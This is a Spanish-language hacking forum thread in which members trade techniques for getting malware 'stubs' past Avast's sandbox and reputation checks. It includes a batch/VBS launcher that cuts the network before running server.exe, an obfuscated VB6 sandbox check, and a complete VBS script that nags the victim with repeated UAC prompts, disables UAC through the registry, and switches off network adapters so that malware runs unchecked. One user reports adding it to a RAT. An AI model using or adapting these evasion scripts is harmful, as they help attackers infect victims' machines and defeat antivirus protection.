justamente como lo están leyendo colegas este, maldito av ya me tiene la pelotas al rojo vivo ni duermo bien bregando y buscando como hacer que avast no tome mi server en la caja de arena de su sandbox para luego hacer un scanner de reputación de forma online

ahora me toca destacar las cosas que he hecho y lo que hay que hacer o lograr hacer para conseguir burla este av.

una de las cosas que nos haría bypasear el sandbox de avast es hacer que nuestro stub tenga reputación como se consigue eso?
colocando una firma digital en nuestra aplicación

existen 3 personas a las cuales e visto que bypasear el avast sandbox es como comerse un pan con jamón para ellos
una es una persona que tiene un canal en youtube llamado Informática segura, el otro es MCN, y el último es Rudeboy1991

un colega mío amigo de MCN confirmó que ellos quitan avast sandbox con avfuker e incluso el usuario informatica segura en youtube tiene un video similar

el punto de este post es by pasearnos ese av todos juntos
una vez le pregunté a rudeboy1991 sobre eso , sobre by pasear el avast sandbox y me dijo que era el runpe y como es cierto eso? si con tan solo un simple anotador salta esa desgracia




uno cosa por aclarar eso del sleep de 20 o más segundo eviten hablar de eso al menos que sea eso productivo eso ya no funciona como en el 2013

ya el sleep solo sirve para el Avast DeepScreen con unos 30 segundos a la mierda el Avast DeepScreen
otra cosa es también el Avast CyberCapture es evitar usar o iniciarse desde un formulario en el proyecto de tu stub

tampoco funciona el bat y el vbs solo dependiendo dependiendo de cómo lo uses

codigo vbs:
 

set syo = createobject("wscript.shell")
syo.run "ejecutar.bat"

codigo bat:
ipconfig /release
ping -n 3 localhost > NUL
start server.exe
ping -n 8 localhost > NUL
ipconfig /renew

tambien consegui leer que compilando el stub en cierto lugares se conseguía saltar el avast sandbox, tambien lo probe y nada
otro dato después del reinicio ya avast toma nuestro server como confiable coso que intente

ningun exe que no sea o tenga reputación va a bypasear a avast sandbox ya que al mínimo instante de ser ejecutado nuestro servidor ya queda comprometido
el server en la caja de arena para ser analizado y si intentas ejecutar algo durante esos 15 segundos de análisis a tu exe corres el riesgo de ser eliminado por causa de comportamiento inusual durante el análisis

bueno esto es poco para todo lo que ley realmente

aquí también otro codigo mas en vb6:

Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Dim SimpleAntiExample As Long

Sub Main()
Call CheckAvastSandBox
End Sub


Private Function CheckAvastSandBox() As Boolean
SimpleAntiExample = GetModuleHandleSimpleAntiExample = GetModuleHandle(Chr$(115) & Chr$(110) & Chr$(120) & Chr$(104) & Chr$(107) & Chr$(46) & Chr$(100) _ 
 & Chr$(108) & Chr$(108))
If SimpleAntiExample = 0 Then
End 
End If
End Function
vamos a darle en la madre a ese av animémonos colegas


aqui les dejo el video del canal de informática segura donde el evade el sandbox de avast con avfuker a ver que logramos todos espero que colaboren

[Enlace externo eliminado para invitados]

echenle un ojo dejen sus ideas el punto es conseguir bypasearlo
y si algún veterano del foro quiero compartir alguna ideas se le agradese![/color]
d3vilz5 escribió: 21 Jun 2017, 23:01
uno cosa por aclarar eso del sleep de 20 o más segundo eviten hablar de eso al menos que sea eso productivo eso ya no funciona como en el 2013
Dices eso pero luego dejas un video de 2013. Bien.

PD: si funciona
666699966999999996699966699999
666699966999999996699966969999
699999966999999996699966996999
666699966999999996699966999699
666699966999999996699966999699
699999996699999966999966996999
699999999669999669999966969999
699999999996666999999966699999
https://reversecodes.wordpress.com

http://indeseables.github.io/
yo aclare porque el sleep no tenía caso! hablar sobre eso
y después explique que cosas si quitaba el usar el sleep y dije que
si sirve para saltarse el avast deepscreen con unos 28 o 30 segundos
antes usar el sleep en el 2013 avast ni atrapaba el exe dentro de la caja de arena osea que solo te lo by pasabas con solo usar sleep de 30 segundos o un poco menos pero ya no porque avast cambió la forma de hacer las cosas en su antivirus

y sobre el video del 2013 porque no podría funcional a esta fecha de hoy?

mcn y rudeboy1991 son amantes de la modificación en binario al punto que el mismo mcn modea en binario confirmado porque lo dijo el mismo
entonces cada compilado de un stub en lenguaje que sea genera un código distinto en hexadecimal de modo que cada stub es muy diferente por dentro y si despues de eso le haces avfuker porque lo del video no podria funcional?

a ti no te funciona el avfuker? ahi unos cuándo videos en youtube que te recomiendo verlo para que aprendas a usarlo si es que eres nuevo en el foro
mira aqui te dejo un video del master rudeboy1991 te vendría bien ver el video en un pro rudeboy1991 para mi unos de los mejores

[Enlace externo eliminado para invitados]

[Enlace externo eliminado para invitados]

saludos! espero que te sirva de mucho este tuto amigo
[Enlace externo eliminado para invitados]
aca hay una forma que no se si esta parchada,
es del año pasado si no entendi mal es hacer que en modo kernel se guarde el ejecutable fuera del proceso aislado del sandbox
paresco malo ,pero soy bueno
Madre mia, vaya falta de comprension lectora tienes amigo.
El que ha dicho que no quiere metodos de 2013 has sido tu

PD: aprende a escribir y expresarte "amigo"
666699966999999996699966699999
666699966999999996699966969999
699999966999999996699966996999
666699966999999996699966999699
666699966999999996699966999699
699999996699999966999966996999
699999999669999669999966969999
699999999996666999999966699999
https://reversecodes.wordpress.com

http://indeseables.github.io/
El 02/02/2017 conseguí bypassearlo desactivando las adaptadoras de red con un script vbs.
El problema es que para desactivar las adaptadoras necesitas ejecutarte en modo administrador, es aquí donde entra en juego la UAC.
Yo no tengo ningun script ni nada para bypassear la UAC así que hice unas pruebas a modo chapuza.
La cuestión es que mi vbs actuaba de downloader entonces estaba fud al avast descargaba un archivo y antes de ejecutarlo desactivaba la adapadora de red de forma que avast se quedaba sin poder revisar hashes ni reputaciones de archivos. Si el avast salta al descargar el bichito con el vbs entonces cargate el bichito dentro el propio vbs y programa que lo extraiga y lo ejecute cuando las adaptadoras estén desactivadas.

Total lo único que se me ocurrió para que finalmente pudiera ejecutarme en modo administrador y poder llevar a cabo la tarea del bichito fue programar el vbs de forma que entrara en bucle infinito hasta que el usuario no le diera al "ejecutar" o "si" en vez de en "cancelar" o "no".
Es algo bastante descarado ya que si le das en cancelar va apareciendo la UAC a modo de ransomware :jaja:
Pero si hay algo de bueno en esto y es que si consigues 1 sola vez ejecutarte en modo administrador ya puedes aprovechar para desactivar la UAC tu mismo y ya no vas a necesitar preguntar ejecutarte como administrador las próximas veces así que podrás desactivar las adaptadoras satisfactoriamente para ejecutar los bichitos sin que avast toque los cojones.

La forma de detectar si el usuario ha elegido "ejecutar" o "si" en vez de "cancelar" o "no" es muy rudimentaria.
A cada ejecución se hace un recorrido de todos los procesos en memoria y se cuenta cuantos procesos hay que se llamen "wscript.exe" si hay solo 1, es la primera instancia del vbs que por defecto se habrá ejecutado en modo user y no administrador.
Entonces el vbs (en modo user) pide ejecutarse de nuevo en modo administrador.
Si el usuario le da a cancelar no se inicia ninguna instancia nueva de wscript.exe, el vbs en modo user cuenta los procesos en memoria. Si solo hay 1 que se llame wscript.exe es él mismo y por lo tanto no hay otra instancia de wscript.exe que sería la que estaría corriendo en modo administrador y por lo tanto vuelve a insistir en ejecutarse en modo administrador.
Luego vuelve a hacer un recorrido de todos los procesos en memoria. Esta vez, si hay 2 procesos que se llamen wscript.exe entonces 1 proceso sera este propio archivo y el otro sera este mismo archivo pero ejecutándose en modo administrador (el usuario le habrá tenido que dar por cojones a "ejecutar" para que se inicie una instancia nueva de wscript.exe") por lo tanto como ya esta el mismo archivo corriendo en modo administrador el que se ha ejecutado en modo user ya puede auto-destruirse (wscript.quit).

Es rudimentario porque puede ser que ya tenga otros scripts en wscript corriendo en la pc y esto daría errores.
Hay que ser mas especifico a la hora de detectar esto. No basta solo con ver si están corriendo 1 o 2 wscript.exe.
Esto lo hice para pruebas personales. Si alguien le gusto la idea y quiere echarle mano aquí le dejo el script.
Saludos :drinking:
strComputer = "."

Set oShell = WScript.CreateObject ("WScript.Shell")
set objwmiservices = getobject("winmgmts:\\.\root\cimv2")

if WScript.Arguments.length = 0 then 
dim counter
counter=1

while counter=1

Set objShell = CreateObject("Shell.Application")
objShell.ShellExecute "wscript.exe", """" & _
WScript.ScriptFullName & """" &_
" RunAsAdministrator", , "runas", 1



Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _ 
& strComputer & "\root\cimv2") 

Set colProcess = objWMIService.ExecQuery _
("Select * from Win32_Process")


counter=0
For Each objProcess in colProcess
if objProcess.Name = "wscript.exe" then
counter=counter+1
end if
Next

wend

wscript.quit

else 

oShell.run "cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f", vbhide 


Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2") 
Set colItems = objWMIService.ExecQuery( _
"SELECT * FROM Win32_NetworkAdapter Where NetEnabled = 'True'")

For Each objItem in colItems

objItem.Disable

Next

Set colItems = objWMIService.ExecQuery( _
"SELECT * FROM Win32_NetworkAdapter Where NetEnabled = 'False'")

Wscript.sleep 10000

For Each objItem in colItems

objItem.Enable

Next

end if

PD: Esta con 10 segundos de delay entre desactivar las adaptadoras de red y volverlas a activar, deberíais hacer vuestra faena mientras las adaptadoras estén desactivadas. El tiempo podéis cambiarlo pero poner algo razonable.
Skype: Janpr99
Janpr99 escribió: 29 Jun 2017, 05:27 El 02/02/2017 conseguí bypassearlo desactivando las adaptadoras de red con un script vbs.
El problema es que para desactivar las adaptadoras necesitas ejecutarte en modo administrador, es aquí donde entra en juego la UAC.
Yo no tengo ningun script ni nada para bypassear la UAC así que hice unas pruebas a modo chapuza.
La cuestión es que mi vbs actuaba de downloader entonces estaba fud al avast descargaba un archivo y antes de ejecutarlo desactivaba la adapadora de red de forma que avast se quedaba sin poder revisar hashes ni reputaciones de archivos. Si el avast salta al descargar el bichito con el vbs entonces cargate el bichito dentro el propio vbs y programa que lo extraiga y lo ejecute cuando las adaptadoras estén desactivadas.

Total lo único que se me ocurrió para que finalmente pudiera ejecutarme en modo administrador y poder llevar a cabo la tarea del bichito fue programar el vbs de forma que entrara en bucle infinito hasta que el usuario no le diera al "ejecutar" o "si" en vez de en "cancelar" o "no".
Es algo bastante descarado ya que si le das en cancelar va apareciendo la UAC a modo de ransomware :jaja:

Pero si hay algo de bueno en esto y es que si consigues 1 sola vez ejecutarte en modo administrador ya puedes aprovechar para desactivar la UAC tu mismo y ya no vas a necesitar preguntar ejecutarte como administrador las próximas veces así que podrás desactivar las adaptadoras satisfactoriamente para ejecutar los bichitos sin que avast toque los cojones.

La forma de detectar si el usuario ha elegido "ejecutar" o "si" en vez de "cancelar" o "no" es muy rudimentaria.
A cada ejecución se hace un recorrido de todos los procesos en memoria y se cuenta cuantos procesos hay que se llamen "wscript.exe" si hay solo 1, es la primera instancia del vbs que por defecto se habrá ejecutado en modo user y no administrador.
Entonces el vbs (en modo user) pide ejecutarse de nuevo en modo administrador.
Si el usuario le da a cancelar no se inicia ninguna instancia nueva de wscript.exe, el vbs en modo user cuenta los procesos en memoria. Si solo hay 1 que se llame wscript.exe es él mismo y por lo tanto no hay otra instancia de wscript.exe que sería la que estaría corriendo en modo administrador y por lo tanto vuelve a insistir en ejecutarse en modo administrador.
Luego vuelve a hacer un recorrido de todos los procesos en memoria. Esta vez, si hay 2 procesos que se llamen wscript.exe entonces 1 proceso sera este propio archivo y el otro sera este mismo archivo pero ejecutándose en modo administrador (el usuario le habrá tenido que dar por cojones a "ejecutar" para que se inicie una instancia nueva de wscript.exe") por lo tanto como ya esta el mismo archivo corriendo en modo administrador el que se ha ejecutado en modo user ya puede auto-destruirse (wscript.quit).

Es rudimentario porque puede ser que ya tenga otros scripts en wscript corriendo en la pc y esto daría errores.
Hay que ser mas especifico a la hora de detectar esto. No basta solo con ver si están corriendo 1 o 2 wscript.exe.
Esto lo hice para pruebas personales. Si alguien le gusto la idea y quiere echarle mano aquí le dejo el script.
Saludos :drinking:
strComputer = "."

Set oShell = WScript.CreateObject ("WScript.Shell")
set objwmiservices = getobject("winmgmts:\\.\root\cimv2")

if WScript.Arguments.length = 0 then 
dim counter
counter=1

while counter=1

Set objShell = CreateObject("Shell.Application")
objShell.ShellExecute "wscript.exe", """" & _
WScript.ScriptFullName & """" &_
" RunAsAdministrator", , "runas", 1



Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _ 
& strComputer & "\root\cimv2") 

Set colProcess = objWMIService.ExecQuery _
("Select * from Win32_Process")


counter=0
For Each objProcess in colProcess
if objProcess.Name = "wscript.exe" then
counter=counter+1
end if
Next

wend

wscript.quit

else 

oShell.run "cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f", vbhide 


Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2") 
Set colItems = objWMIService.ExecQuery( _
"SELECT * FROM Win32_NetworkAdapter Where NetEnabled = 'True'")

For Each objItem in colItems

objItem.Disable

Next

Set colItems = objWMIService.ExecQuery( _
"SELECT * FROM Win32_NetworkAdapter Where NetEnabled = 'False'")

Wscript.sleep 10000

For Each objItem in colItems

objItem.Enable

Next

end if

PD: Esta con 10 segundos de delay entre desactivar las adaptadoras de red y volverlas a activar, deberíais hacer vuestra faena mientras las adaptadoras estén desactivadas. El tiempo podéis cambiarlo pero poner algo razonable.
Se lo añadi a HWORM pero si detectando el comportamiento
janpr99 yo tengo como ejecutar tu vbs como admin hablame por el skype para pasarte el código

joselin gracias por tu info bro!
y te comento que ese tuto lo mire antes y no lo comprendí hasta que tu me lo hiciste releer simple mente por el hecho de que me aclaraste que para conseguirlo hay que hacer que el modo kernel se guarde el ejecutable fuera del proceso aislado del sandbox
estoy justamente intentando hacer eso!

Salu2...
Responder

Volver a “Dudas y Preguntas”